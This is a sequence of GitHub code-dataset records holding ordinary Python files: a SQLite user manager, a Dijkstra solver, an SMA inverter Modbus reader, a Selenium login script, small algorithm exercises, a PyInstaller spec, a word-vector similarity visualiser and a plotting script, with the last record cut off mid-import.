+{"seq_id":"38207243427","text":"import sqlite3\nfrom random import randint\nfrom queue import Queue\nfrom threading import Event, Thread\n\n\nalph = \"abcdef\"\nMAIN_TB = \"MAIN_TABLE\"\n\n\nclass DB_Manager:\n    def __init__(self):\n        self.db_dir = \"serv.db\"\n        self.connection = sqlite3.connect(self.db_dir, check_same_thread=False)\n        self.to_drop = False\n    #! delete /\n    def setup(self): # ?None<-- -->None\n        cursor = self.connection.cursor()\n        try:\n            if self.to_drop:\n                print(\"dropping main table \")\n                cursor.execute('''DROP TABLE MAIN_TABLE''')\n            cursor.execute('''CREATE TABLE MAIN_TABLE\n            (\n            user_id INTEGER PRIMARY KEY AUTOINCREMENT,\n            account_name TEXT,\n            is_online INTEGER\n            )''')\n        except:\n            pass\n        self.connection.commit()\n        # self.test_fill()\n        self.get_tbl(\"MAIN_TABLE\")\n        del cursor\n        return None\n    #! delete /\n    def create_main_table(self):\n        cursor = self.connection.cursor()\n        try:\n            cursor.execute('''CREATE TABLE MAIN_TABLE\n            (\n            user_id INTEGER PRIMARY KEY AUTOINCREMENT,\n            account_name TEXT,\n            is_online INTEGER\n            )''')\n            self.connection.commit()\n        except:\n            print(\"Main table already created\")\n\n        return None\n    def delete_users(self):\n        self.drop_tbl(\"MAIN_TABLE\")\n        self.create_main_table()\n        self.connection.commit()\n        return None\n\n    def get_tbl(self, table): # ? None<-- --> None\n        cursor = self.connection.cursor()\n        for row in cursor.execute('''SELECT * FROM {}'''.format(table)):\n            print(row)\n        del cursor\n        return None\n\n    def update_value(self, table, account_name, column, value): # ? None<-- -->None
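\n        # sqlite3 binds parameters from a sequence, so a bare string would be\n        # treated as one parameter per character -- the account name therefore\n        # has to be passed as a one-element tuple below.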
\n        cursor = self.connection.cursor()\n        cursor.execute(\n            'UPDATE {} SET {}={} WHERE account_name==?'.format(table, column, value), (account_name,))\n        self.connection.commit()\n        del cursor\n        return None\n\n    def is_existent(self, account_name): # ? string<-- --> bool\n        cursor = self.connection.cursor()\n        value = cursor.execute(\n            'SELECT is_online from MAIN_TABLE WHERE account_name==?', (account_name,))\n        self.connection.commit()\n        del cursor\n        if value.fetchall() == []:\n            return False\n        else:\n            return True\n\n    def disconnect_all(self):\n        cursor = self.connection.cursor()\n        table = \"MAIN_TABLE\"\n        column = \"is_online\"\n        value = 0\n        cursor.execute('UPDATE {} SET {}={} '.format(table, column, value))\n        self.connection.commit()\n        return None\n\n    def disconnect_user(self, account_name): # ?(string)->None\n        self.update_value(MAIN_TB, account_name, \"is_online\", 0)\n        return None\n\n    def connect_user(self, account_name):\n        self.update_value(MAIN_TB, account_name, \"is_online\", 1)\n        return None\n\n    def append_client(self, account_name):\n        cursor = self.connection.cursor()\n        is_online = 1 # * if user has signed up, then he is online\n        cursor.execute('''INSERT INTO {}(account_name,is_online) VALUES (?,?)'''.format(\n            \"MAIN_TABLE\"), (account_name, 1))\n        self.connection.commit()  # persist the insert; without a commit the row is lost\n        return None\n\n    def is_online(self, account_name): # ? string<-- -->bool\n        cursor = self.connection.cursor()\n        for row in cursor.execute('SELECT is_online from MAIN_TABLE WHERE account_name==?', (account_name,)):\n            is_online = row[0]\n            if is_online:\n                return True\n            else:\n                return False\n        self.connection.commit()\n        del cursor\n        return None\n\n    def drop_tbl(self, table): # ?(string)->None\n        cursor = self.connection.cursor()\n        cursor.execute(\"DROP TABLE {};\".format(table))\n        self.connection.commit()\n        return None","repo_name":"grishchenkoalexey2004/QuickText-Messenger","sub_path":"server_db.py","file_name":"server_db.py","file_ext":"py","file_size_in_byte":4146,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"3225523095","text":"import heapq\r\nimport sys\r\n\r\ninput = sys.stdin.readline\r\n\r\nMAX = int(1e9)\r\nN = int(input())\r\nM = int(input())\r\ngraph = [[] for _ in range(N + 1)]\r\ndistance = [MAX] * (N + 1)\r\nvias = [0] * (N + 1)\r\n\r\nfor _ in range(M):\r\n    a, b, c = map(int, input().split())\r\n    graph[a].append((b, c))\r\n\r\nstart, end = map(int, input().split())\r\n\r\n\r\ndef dijkstra(start):\r\n    queue = []\r\n    heapq.heappush(queue, (0, start))\r\n    distance[start] = 0\r\n    while queue:\r\n        dist, now = heapq.heappop(queue)\r\n        if distance[now] < dist:\r\n            continue\r\n        for line in graph[now]:\r\n            if dist + line[1] < distance[line[0]]:\r\n                distance[line[0]] = dist + line[1]\r\n                vias[line[0]] = now\r\n                heapq.heappush(queue, (dist + line[1], line[0]))\r\n\r\n\r\ndijkstra(start)\r\nprint(distance[end])
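\r\n# The vias list holds each node's predecessor on the shortest path, so the\r\n# route is rebuilt by walking it backwards from end until start is reached.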
\r\nanswer = [end]\r\ntemp = end\r\nwhile 1:\r\n    if temp == start:\r\n        break\r\n    answer.append(vias[temp])\r\n    temp = vias[temp]\r\nprint(len(answer))\r\nanswer.reverse()\r\nprint(*answer)\r\n","repo_name":"jjun990908/Algorithm","sub_path":"백준/Gold/11779. 최소비용 구하기 2/최소비용 구하기 2.py","file_name":"최소비용 구하기 2.py","file_ext":"py","file_size_in_byte":1019,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"31"} +{"seq_id":"34714577186","text":"#!/usr/bin/env python\r\n# -*- coding: utf-8 -*-\r\n\r\n# #################################################################################################\r\n## \brief\r\n# \details\r\n# \file GetSmaTotal.py\r\n#\r\n# \date Created on: 13.03.2020\r\n# \author moosburger\r\n#\r\n# ######################################################################################\r\n# Version    Date        Ticket#     Description\r\n# 1.0        13.03.2020\r\n#\r\n# #################################################################################################\r\n\r\n# #################################################################################################\r\n# # Debug settings\r\n# #################################################################################################\r\nbDebug = False\r\nbDebugOnLinux = False\r\n\r\n# This allows importing from a different path. Import the modules that are used locally before extending the path\r\nif(bDebug == False):\r\n    importPath = '/mnt/dietpi_userdata/Common'\r\n\r\nelif(bDebugOnLinux == True):\r\n    importPath = '/home/users/Grafana/Common'\r\n\r\nelse:\r\n    importPath = 'D:\\\Users\\\Download\\\PvAnlage\\\Common'\r\n\r\n# #################################################################################################\r\n# # Python Imports (Standard Library)\r\n# #################################################################################################\r\n\r\nfrom pymodbus.client import ModbusTcpClient as ModbusClient\r\nfrom pymodbus.register_read_message import ReadHoldingRegistersResponse\r\nimport ctypes\r\nimport sys\r\nimport os\r\nimport locConfiguration as _conf\r\nfrom datetime import datetime\r\n\r\n# #################################################################################################\r\n# # Python Imports (site-packages)\r\n# #################################################################################################\r\nsys.path.insert(0, importPath)\r\nimport Utils\r\n\r\n# ------------------------------------------------------------------------#\r\n# Define client\r\n# ------------------------------------------------------------------------#\r\n#SMA\r\nmodbus = ModbusClient('192.168.2.43' , port=_conf.MODBUS_PORT)\r\nmodbus.connect()\r\n\r\n# #################################################################################################\r\n# These classes/structures/unions allow easy conversion between\r\n# modbus 16bit registers and ctypes (a useful format)\r\n# #################################################################################################\r\n\r\n# Two bytes (16 bit) based types\r\nclass x2u8Struct(ctypes.Structure):\r\n    _fields_ = [(\"h\", ctypes.c_uint8),\r\n                (\"l\", ctypes.c_uint8)]\r\nclass convertChar(ctypes.Union):\r\n    _fields_ = [(\"u8\", x2u8Struct),\r\n                (\"u16\", ctypes.c_uint16),\r\n                (\"s16\", ctypes.c_int16)]\r\n\r\n# Single register (16 bit) based types\r\nclass convert1(ctypes.Union):\r\n    _fields_ = [(\"u16\", ctypes.c_uint16),\r\n                (\"s16\", ctypes.c_int16)]
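\r\n\r\n# SMA spreads each value over one, two or four 16-bit Modbus registers; the\r\n# unions here overlay those raw registers with signed, unsigned, float and\r\n# character views so a register group can be reinterpreted without manual\r\n# bit shifting.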
\r\n\r\n# Two register (32 bit) based types\r\nclass x2u16Struct(ctypes.Structure):\r\n    _fields_ = [(\"h\", ctypes.c_uint16),\r\n                (\"l\", ctypes.c_uint16)]\r\nclass convert2(ctypes.Union):\r\n    _fields_ = [(\"float\", ctypes.c_float),\r\n                (\"u16\", x2u16Struct),\r\n                (\"sint32\", ctypes.c_int32),\r\n                (\"uint32\", ctypes.c_uint32)]\r\n\r\n# Four register (64 bit) based types\r\nclass x4u16Struct(ctypes.Structure):\r\n    _fields_ = [(\"hh\", ctypes.c_uint16),\r\n                (\"hl\", ctypes.c_uint16),\r\n                (\"lh\", ctypes.c_uint16),\r\n                (\"ll\", ctypes.c_uint16)]\r\nclass convert4(ctypes.Union):\r\n    _fields_ = [(\"u16\", x4u16Struct),\r\n                (\"sint64\", ctypes.c_int64),\r\n                (\"uint64\", ctypes.c_uint64)]\r\n\r\n# #################################################################################################\r\n# # Functions\r\n# # Prototypes\r\n# # if __name__ == '__main__':\r\n# #################################################################################################\r\n\r\n# #################################################################################################\r\n# # Classes: TotalSmaEnergy\r\n## \details#\r\n#\r\n# #################################################################################################\r\nclass TotalSmaEnergy():\r\n\r\n\r\n# #################################################################################################\r\n# # Function: ' Constructor '\r\n## \details Initialises the TotalSmaEnergy class\r\n# \param[in] self the object pointer\r\n# \param[in] interval\r\n# \param[in] CallBack\r\n# \return -\r\n# #################################################################################################\r\n    def __init__(self, logger):\r\n\r\n        self.log = logger.getLogger('SmaEnergy')\r\n        self.log.info(\"started\")\r\n\r\n        self.Data = {}\r\n\r\n# # End function: ' Constructor ' ################################################################\r\n\r\n# #################################################################################################\r\n# # Function: ' Destructor '\r\n# #################################################################################################\r\n    #def __del__(self):\r\n\r\n# # End function: ' Destructor ' #################################################################\r\n\r\n# #################################################################################################\r\n# # Function: '_FetchSmaTotal '\r\n## \t\details\r\n# \param[in]\r\n# \return -\r\n# #################################################################################################\r\n    def FetchSmaTotal(self, WriteOut):\r\n\r\n        SunSpecUnit = 126\r\n        SmaUnit = 3\r\n        SmaProfil = ()\r\n\r\n        try:\r\n            if (WriteOut == False):\r\n                SmaProfil = ((' Tagesertrag',30535, 2,0, SmaUnit),)\r\n            else:\r\n                SmaProfil = (\r\n                    (' Seriennummer',40053,16,0, SunSpecUnit),\r\n                    (' Softwarepaket',40045, 8,0, SunSpecUnit),\r\n                    (' Geraetetyp1',40240, 1,0, SunSpecUnit),\r\n                    (' Geraetetyp2',40037, 8,0, SunSpecUnit),\r\n                    (' Gesamtertrag1',40303, 4,0, SunSpecUnit),\r\n                    (' Gesamtertrag2',40210, 2,40212, SunSpecUnit),\r\n                    (' Leistung',40200, 1,40201, SunSpecUnit),\r\n                    (' Ac1 Spannung',40196, 1,40199, SunSpecUnit),\r\n                    (' Ac2 Spannung',40197, 1,40199, SunSpecUnit),\r\n                    (' Ac3 Spannung',40198, 1,40199, SunSpecUnit),\r\n                    (' Ac1 Strom',40189, 1,40192, SunSpecUnit),\r\n                    (' Ac2 Strom',40190, 1,40192, SunSpecUnit),\r\n                    (' Ac3 Strom',40191, 1,40192, SunSpecUnit),\r\n                    ('Innentemperatur',40219, 1,0, SunSpecUnit),\r\n                    (' Dc1 Spannung',40642, 1,40625, SunSpecUnit),\r\n                    (' Dc2 Spannung',40662, 1,40625, SunSpecUnit),\r\n                    (' Dc1 Strom',40641, 1,40624, SunSpecUnit),\r\n                    (' Dc2 Strom',40661, 1,40624, SunSpecUnit),\r\n                    (' Dc1 Leistung',40643, 1,40626, SunSpecUnit),\r\n                    (' Dc2 Leistung',40663, 1,40626, SunSpecUnit),\r\n                    (' Betriebsstatus',40224, 1,0, SunSpecUnit),
\r\n                    (' Ereignisnummer',40226, 2,0, SunSpecUnit),\r\n                    (' MAC-Adresse',40076, 4,0, SunSpecUnit),\r\n                    (' IP-Adresse',40097, 8,0, SunSpecUnit),\r\n                    #(' Gesamtertrag3',30529, 2,0, SmaUnit),\r\n                    (' Tagesertrag',30535, 2,0, SmaUnit)\r\n                )\r\n\r\n            sunSpecData = {}\r\n\r\n            self.Data['Now'] = datetime.now()\r\n\r\n            for dataSet in SmaProfil:\r\n                UNIT = dataSet[4]\r\n\r\n                adrOfs = 0\r\n                if (SunSpecUnit == UNIT):\r\n                    adrOfs = 1\r\n\r\n                des = dataSet[0]\r\n                adr = dataSet[1] - adrOfs\r\n                leng = dataSet[2]\r\n                skr = dataSet[3] - adrOfs\r\n                Translate = 0\r\n                TranslateScale = 0\r\n\r\n                raw = 0\r\n                sk = 0\r\n                val = ''\r\n                if (skr > 0):\r\n                    sk = modbus.read_holding_registers(skr, 1, slave=UNIT)\r\n\r\n                raw = modbus.read_holding_registers(adr, leng, slave=UNIT)\r\n                if isinstance(raw, ReadHoldingRegistersResponse):\r\n                    if (leng == 16):\r\n                        Translate = convertChar()\r\n                        for chrGrp in raw.registers:\r\n                            if (chrGrp == 0):\r\n                                break\r\n                            Translate.u16 = chrGrp\r\n                            val = val + chr(Translate.u8.l) + chr(Translate.u8.h)\r\n\r\n                    elif (leng == 8):\r\n                        Translate = convertChar()\r\n                        for chrGrp in raw.registers:\r\n                            if (chrGrp == 0):\r\n                                break\r\n                            Translate.u16 = chrGrp\r\n                            val = val + chr(Translate.u8.l) + chr(Translate.u8.h)\r\n\r\n                    elif (leng == 4):\r\n                        Translate=convert4()\r\n                        Translate.u16.hh = raw.registers[3]\r\n                        Translate.u16.hl = raw.registers[2]\r\n                        Translate.u16.lh = raw.registers[1]\r\n                        Translate.u16.ll = raw.registers[0]\r\n                        val = Translate.uint64\r\n\r\n                    elif (leng == 2):\r\n                        Translate=convert2()\r\n                        Translate.u16.h = raw.registers[1]\r\n                        Translate.u16.l = raw.registers[0]\r\n                        val = Translate.uint32\r\n\r\n                    else:\r\n                        Translate=convert1()\r\n                        Translate.u16=raw.registers[0]\r\n                        TranslateScale=convert1()\r\n                        TranslateScale.u16 = 0\r\n\r\n                        if (skr > 0):\r\n                            TranslateScale.u16 = sk.registers[0]\r\n\r\n                        val = Translate.s16*(10**(TranslateScale.s16))\r\n\r\n                        if (Translate.u16 == 0xFFFF) or (Translate.u16 == 0x8000):\r\n                            val = 0\r\n\r\n                    sunSpecData[str(adr + adrOfs)] = val\r\n\r\n                    if ((adr + 1) == 40303): # Gesamtertrag1\r\n                        timestamp = \"{}.{}.{} {}:{} {}\".format(self.Data['Now'].strftime(\"%d\"), self.Data['Now'].strftime(\"%m\"), self.Data['Now'].strftime(\"%Y\"), self.Data['Now'].strftime(\"%H\"), self.Data['Now'].strftime(\"%M\"), self.Data['Now'].strftime(\"%S\"))\r\n                        datStream = \"TimeStamp: {} Total energy: {} Wh\\n\".format(timestamp, val)\r\n\r\n                        strFolder = \"{}{}\".format(_conf.EXPORT_FILEPATH, self.Data['Now'].strftime(\"%Y\"))\r\n                        fileName = \"{}/SmaTotalEnergy.log\".format(strFolder)\r\n\r\n                        if (not os.path.exists(strFolder)):\r\n                            os.mkdir(strFolder)\r\n                            # chmod takes octal numbers: Python 2 uses a leading 0, Python 3 uses 0o\r\n                            os.chmod(strFolder, 0o777)\r\n\r\n                        Utils._write_File(fileName , datStream, \"a\")\r\n            modbus.close()\r\n\r\n            # SMA clears the daily yield at midnight...\r\n            if (sunSpecData['30535'] > 0):\r\n                self.Data['TodayWh'] = sunSpecData['30535']\r\n\r\n            if (WriteOut == True):\r\n                self.Data['RelVer'] = sunSpecData['40045'].replace('\\00', '/00')\r\n                self.Data['host'] = sunSpecData['40097']\r\n                self.Data['Status'] = sunSpecData['40224']\r\n                #self.Data['StatusTxt'] = sunSpecData['aaa']\r\n                self.Data['InvName'] = 'PowerDorf'\r\n                self.Data['InvSN'] = sunSpecData['40053']\r\n                self.Data['InvModel'] = 'Sunnboy 3.0'\r\n                self.Data['InvString'] = '2'\r\n                self.Data['InvPhase'] = '1'\r\n                self.Data['TotalWh'] = sunSpecData['40303']\r\n                #self.Data['TotalWh2'] = sunSpecData['30529']\r\n\r\n                self.Data['CC_P'] = sunSpecData['40643'] + sunSpecData['40663']\r\n                self.Data['CA_P'] = sunSpecData['40200']
\r\n\r\n                self.Data['CC1_U'] = sunSpecData['40642']\r\n                self.Data['CC1_I'] = sunSpecData['40641']\r\n                self.Data['CC1_P'] = sunSpecData['40643']\r\n                self.Data['CC1_T'] = sunSpecData['40219']\r\n\r\n                self.Data['CC2_U'] = sunSpecData['40662']\r\n                self.Data['CC2_I'] = sunSpecData['40661']\r\n                self.Data['CC2_P'] = sunSpecData['40663']\r\n                self.Data['CC2_T'] = sunSpecData['40219']\r\n\r\n                self.Data['CA1_U'] = sunSpecData['40196']\r\n                self.Data['CA1_I'] = sunSpecData['40189']\r\n                self.Data['CA1_P'] = sunSpecData['40200']\r\n                self.Data['CA1_T'] = sunSpecData['40219']\r\n\r\n                self.log.info(\"\")\r\n                self.log.info(\"TimeStamp : {:%m/%d/%y %H:%M %S}\".format(self.Data['Now']))\r\n                self.log.info(\"Comm software : SMA v%s\" % (self.Data['RelVer']))\r\n                self.log.info(\"Comm host : %s\" % self.Data['host'])\r\n                self.log.info(\"Inverter Status : %d\" % self.Data['Status'])\r\n                self.log.info(\"Inverter Name : %s\" % self.Data['InvName'])\r\n                self.log.info(\"Inverter SN : %s\" % self.Data['InvSN'])\r\n                self.log.info(\"Inverter Model : %s\" % self.Data['InvModel'])\r\n                self.log.info(\"Inverter String : %s\" % self.Data['InvString'])\r\n                self.log.info(\"Inverter Phase : %s\" % self.Data['InvPhase'])\r\n                self.log.info(\"Total energy : %d Wh\" % self.Data['TotalWh'])\r\n                #self.log.info(\"Total energy2 : %d Wh\" % self.Data['TotalWh2'])\r\n                self.log.info(\"Today energy : %d Wh\" % self.Data['TodayWh'])\r\n                self.log.info(\"DC Power : %5d W\\tAC Power : %5d W\" % (self.Data['CC_P'], self.Data['CA_P']))\r\n                self.log.info('DC String 1 : %5.1f V %4.2f A %4d W T= %5.2f C' % (self.Data['CC1_U'], self.Data['CC1_I'], self.Data['CC1_P'], self.Data['CC1_T']))\r\n                self.log.info('DC String 2 : %5.1f V %4.2f A %4d W T= %5.2f C' % (self.Data['CC2_U'], self.Data['CC2_I'], self.Data['CC2_P'], self.Data['CC2_T']))\r\n                self.log.info('AC Phase 1 : %5.1f V %4.2f A %4d W T= %5.2f C' % (self.Data['CA1_U'], self.Data['CA1_I'], self.Data['CA1_P'], self.Data['CA1_T']))\r\n\r\n        except:\r\n            for info in sys.exc_info():\r\n                self.log.error(\"FetchSmaTotal error: {}\".format(info))\r\n                print(\"FetchSmaTotal error: {}\".format(info))\r\n\r\n\r\n    # # End function: ' _FetchSmaTotal(' ###################################################################\r\n\r\n# # End class: ' GetSmaTotal ' ##################################################################\r\n\r\n# # End of file #####################################################################################\r\n","repo_name":"moosburger/EnergieAnzeige","sub_path":"PikoToModBus/Source/GetSmaTotal.py","file_name":"GetSmaTotal.py","file_ext":"py","file_size_in_byte":15567,"program_lang":"python","lang":"de","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"47972255554","text":"from selenium import webdriver\nfrom time import sleep\n\ndriver = webdriver.Chrome('./chromedriver')\ndriver.get('https://nid.naver.com/nidlogin.login')\n\nid = 'id'\npw = 'pw'\n\nsleep(0.5)\ndriver.execute_script(\"document.getElementsByName('id')[0].value=\\'\" + id + \"\\'\")\ndriver.execute_script(\"document.getElementsByName('pw')[0].value=\\'\" + pw + \"\\'\")
\n\nsleep(0.5)\ndriver.find_element_by_xpath('//*[@id=\"frmNIDLogin\"]/fieldset/input').click()\n\nsleep(0.5)\ndriver.find_element_by_xpath('//*[@id=\"PM_ID_ct\"]/div[1]/div[2]/div[1]/ul[1]/li[1]/a').click()\ndriver.close()\n","repo_name":"hyuk067/python_study","sub_path":"week_5/naver_login.py","file_name":"naver_login.py","file_ext":"py","file_size_in_byte":559,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"69804221209","text":"import functools\nfrom typing import List\n\n\ndef mincostTickets(days: List[int], costs: List[int]) -> int:\n    dayset = set(days)\n    durations = [1, 7, 30]\n\n    @functools.lru_cache(None)\n    def dp(i):\n        if i > 365:\n            return 0\n        elif i in dayset:\n            return min(dp(i + d) + c for c, d in zip(costs, durations))\n        else:\n            return dp(i + 1)\n\n    return dp(1)\n","repo_name":"DengBoCong/Algorithm","sub_path":"core/MinimumCostForTickets/MinimumCostForTickets.py","file_name":"MinimumCostForTickets.py","file_ext":"py","file_size_in_byte":402,"program_lang":"python","lang":"en","doc_type":"code","stars":17,"dataset":"github-code","pt":"31"} +{"seq_id":"7305744688","text":"\"\"\"Create a function in Python that accepts a single word and returns the number of vowels in that word. In this\nfunction, only a, e, i, o, and u will be counted as vowels — not y.\"\"\"\n\n\ndef vowel_counter(word):\n    count = 0\n    for i in word:\n        if i in [\"a\", \"e\", \"i\", \"o\", \"u\"]:\n            count += 1\n    return count\n\n\ncounter = vowel_counter(\"aehbgioo\")\n\nprint(counter)","repo_name":"Khanh-Do-devops/portfolio","sub_path":"python/code_academy_4.py","file_name":"code_academy_4.py","file_ext":"py","file_size_in_byte":382,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"42231058495","text":"# -*- mode: python -*-\n\nblock_cipher = None\n\n\na = Analysis(['run_game.py'],\n             pathex=['/Users/pglandon78/PycharmProjects/RunnableExe/game'],\n             binaries=None,\n             datas=None,\n             hiddenimports=[],\n             hookspath=[],\n             runtime_hooks=[],\n             excludes=[],\n             win_no_prefer_redirects=False,\n             win_private_assemblies=False,\n             cipher=block_cipher)\npyz = PYZ(a.pure, a.zipped_data,\n          cipher=block_cipher)\nexe = EXE(pyz,\n          a.scripts,\n          a.binaries,\n          a.zipfiles,\n          a.datas,\n          name='run_game',\n          debug=False,\n          strip=False,\n          upx=True,\n          console=False )\napp = BUNDLE(exe,\n             name='run_game.app',\n             icon=None,\n             bundle_identifier=None)\n","repo_name":"Luceurre/NightmareEscape","sub_path":"game/run_game.spec","file_name":"run_game.spec","file_ext":"spec","file_size_in_byte":839,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"31"} +{"seq_id":"4255717946","text":"import numpy as np\nimport math\nfrom numpy import dot\nfrom numpy.linalg import norm\nfrom utilities import utilities\nimport scipy.misc as smp\nfrom tqdm import tqdm\n\nclass CosineSimilarity():\n\n    def __init__(self, doc_path, dict_path, key_path=None):\n\n        self.doc_path = doc_path\n        self.dict_path = dict_path\n        self.key_path = None\n\n        self.all_dictionary, _ = utilities.readVectorsDict(dict_path)\n        self.subset_dictionary = self.subsetDictFromDocs()\n        self.key_dictionary = dict()\n\n        if key_path:\n            self.key_path = key_path\n            self.key_dictionary = self.getKeyDictionary()\n\n\n    # looks each document word up in the word2vec dictionary and keeps its vector\n    def subsetDictFromDocs(self):\n\n        vectors = dict()\n        for file in self.doc_path:\n            for line in open(file, encoding=\"utf8\"):\n                line = utilities.parseLine(line).split()
\n                if len(line) > 1:\n                    for word in line:\n                        if len(word) > 0 and word not in vectors:\n                            vectors[word] = self.all_dictionary[word]\n\n        return vectors\n\n\n    # get those keys that exist within the main dictionary, e.g. all colours in the document dictionary\n    def getKeyDictionary(self):\n\n        key_dict = dict()\n        all_keys = utilities.readKeyTable(self.key_path)\n\n        for item in self.subset_dictionary:\n            if item in all_keys:\n                key_dict[item] = self.subset_dictionary[item]\n\n        return key_dict\n\n\n    # cosine similarity -> angular distance, scaled to an 8-bit grey value\n    def getDistance(self, row, col):\n        if row == col:\n            return 255\n        vec0, vec1 = self.itemToVec(row, col)\n        cos_sim = abs(dot(vec0, vec1)) / (norm(vec0) * norm(vec1))\n        dist = 1 - math.acos(cos_sim) / math.pi\n        # the image buffer below is uint8, so map [0, 1] onto [0, 255]\n        return int(round(dist * 255))\n\n\n    # this parsing thing is a nightmare\n    def itemToVec(self, key0, key1):\n        item0 = self.subset_dictionary[key0]\n        item1 = self.subset_dictionary[key1]\n        vec0 = np.array(item0).astype(float)\n        vec1 = np.array(item1).astype(float)\n        return vec0, vec1\n\n\n    # writing the distance matrix to an image file\n    def angularDistancesToFile(self, path):\n\n        matrix_header = self.getMatrixHeader()\n\n        width = len(matrix_header) + 1\n        height = len(matrix_header) + 1\n\n        image = np.zeros((height+1, width+1), dtype=np.uint8)\n\n        self.defineImageBorders(image, height, width, matrix_header)\n\n        for i in tqdm(range(1, height)):\n            for j in range(1, width):\n                row = matrix_header[i-1]\n                col = matrix_header[j-1]\n                image[i][j] = self.getDistance(row, col)\n\n        img = smp.toimage(image)\n        smp.imsave(path, img)\n\n\n    def defineImageBorders(self,image, height, width, matrix_header):\n\n        image[0][0] = 210\n        image[height][width] = 210\n\n        for i in range(0, height):\n            image[i][height] = 210\n            image[height][i] = 210\n\n        for i in range(1, height):\n            if matrix_header[i-1] in self.key_dictionary:\n                image[i][0] = 10\n                image[0][i] = 10\n            else:\n                image[i][0] = 210\n                image[0][i] = 210
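\n\n    # Builds the row/column ordering for the matrix image: non-key words fill\n    # the outside while the key-dictionary words (e.g. the colour terms) are\n    # spliced into the middle, so they show up as a contiguous band.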
\n    def getMatrixHeader(self):\n\n        matrix_header = list()\n        subset_dict_len = len(self.subset_dictionary)\n        key_dict_len = len(list(self.key_dictionary.keys()))\n\n        count = 0\n\n        for key in self.subset_dictionary:\n            if key not in self.key_dictionary:\n                matrix_header.append(key)\n                count += 1\n\n                # put the keys (e.g. the colours that we trained on a different corpus) in the middle\n                if count == int((subset_dict_len - key_dict_len)/2):\n                    matrix_header = matrix_header + list(self.key_dictionary.keys())\n\n        return matrix_header\n\n\n\n\n\n","repo_name":"AlexRiepenhausen/MastersDissertation","sub_path":"similarity/cosine.py","file_name":"cosine.py","file_ext":"py","file_size_in_byte":3906,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"31"} +{"seq_id":"10531065450","text":"import numpy as np  # print('numpy imported')\r\nimport os  # print('os imported')\r\nimport glob  # print('glob imported')\r\n\r\n\r\n###############################\r\n######### Search File #########\r\n###############################\r\ndef filestoanalyse( directory, nameToSearch ):\r\n\tos.chdir(directory)  # Change the current working directory\r\n\tlistFile = glob.glob(nameToSearch)  # list of the file names matching nameToSearch\r\n\tnbrFile = np.size(listFile)  # the number of files found\r\n\r\n\treturn listFile, nbrFile\r\n\r\n\r\n###############################\r\n######### Ask Question ########\r\n###############################\r\ndef question( sentence ):\r\n\twhile True:\r\n\t\tpartAnswer = input(sentence)\r\n\r\n\t\tif partAnswer == '1' or partAnswer == '0':\r\n\t\t\tbreak\r\n\r\n\treturn partAnswer\r\n\r\n\r\n##########################################\r\n######### Class basic value data #########\r\n##########################################\r\nclass TraitementFile:\r\n\r\n\tdef __init__( self, nFiles, nameFile, basicProperty, numberMovie ):\r\n\t\t# graph settings shared by all plots\r\n\t\tself.color_file = np.array(\r\n\t\t\t['navy', 'dodgerblue', 'turquoise', 'paleturquoise', 'darkgreen', 'chartreuse', 'y', 'orange',\r\n\t\t\t 'darkred', 'red', 'purple', 'peru', 'deeppink', 'black', 'dimgray'])\r\n\t\tself.mark_file = np.array(['o', 'x', '^', 's'])\r\n\t\tself.line_style_file = np.array(['-', '--', '-.', ':'])\r\n\r\n\t\t# name data\r\n\t\tself.n_files = nFiles\r\n\t\tself.name_file = nameFile\r\n\t\tself.number_movies = numberMovie\r\n\r\n\t\t# basic data\r\n\t\tself.distance = basicProperty\r\n\r\n\t\t# general separation data\r\n\t\tself.delta_x = 44e-6  # 8 points per movie\r\n\r\n\r\n####################################################################\r\n######### function to create a vector containing all data #########\r\n####################################################################\r\n\r\ndef dicalldata( nameDirectory, nAllFile, sizeAllFile ):\r\n\t### Create the variable holding all global data\r\n\tdicAllData = {}\r\n\r\n\tfor i in range(sizeAllFile):\r\n\t\t# Change of directory\r\n\t\tsubDirectoryVideo = '{0}/{1}'.format(nameDirectory, nAllFile[i])\r\n\t\tos.chdir(subDirectoryVideo)\r\n\r\n\t\t# Read the data\r\n\t\tdatGlobal = np.loadtxt('globalAnalysisData.txt')\r\n\t\tvMax = np.loadtxt('V-R.txt')\r\n\r\n\t\t# fill the dictionary\r\n\t\tdicAllData['data_{}'.format(i)] = datGlobal\r\n\t\tdicAllData['V0_{}'.format(i)] = vMax\r\n\r\n\tos.chdir(nameDirectory)\r\n\r\n\treturn dicAllData\r\n","repo_name":"SylvainLo/Doctorat","sub_path":"these/chapitre 3/plot/basefunction.py","file_name":"basefunction.py","file_ext":"py","file_size_in_byte":2355,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"39218403839","text":"# encoding: utf-8\n\nimport pandas as pd\nimport seaborn as sns\nimport matplotlib.pyplot as plt\n\n# def set(context=\"notebook\", style=\"darkgrid\", palette=\"deep\",\n#         font=\"sans-serif\", font_scale=1, color_codes=True, rc=None):
font=\"sans-serif\", font_scale=1, color_codes=True, rc=None):\nsns.set(context=\"notebook\", style=\"whitegrid\", palette=\"dark\")\n\n# get data\ndata = pd.read_csv(\"Data/data0.csv\", names=[\"square\", \"price\"])\n\n# show data\nsns.lmplot(\"square\", \"price\", data, height=8, fit_reg=False)\nplt.show()\n\n# show data and regression plot\nsns.lmplot(\"square\", \"price\", data, height=8, fit_reg=True)\nplt.show()\n\n# show detail\ndata.info()\n# \n# RangeIndex: 47 entries, 0 to 46\n# Data columns (total 2 columns):\n# square 47 non-null int64\n# price 47 non-null int64\n# dtypes: int64(2)\n# memory usage: 880.0 bytes\n# None\n","repo_name":"Kate-liu/MyTensorFlow","sub_path":"HousingPriceForecastingModel/SingleDataReadAndShow.py","file_name":"SingleDataReadAndShow.py","file_ext":"py","file_size_in_byte":806,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"73473386328","text":"import json\nimport os\nimport time\nfrom tracemalloc import start\n\nimport numpy as np\nimport torch\nfrom torch.utils.data import Dataset\nfrom datasets import load_dataset,load_from_disk,concatenate_datasets\nfrom tqdm import 